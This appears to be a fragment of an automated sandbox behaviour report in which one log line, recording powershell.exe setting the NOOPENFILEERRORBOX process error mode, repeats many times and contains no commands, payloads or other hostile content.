            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
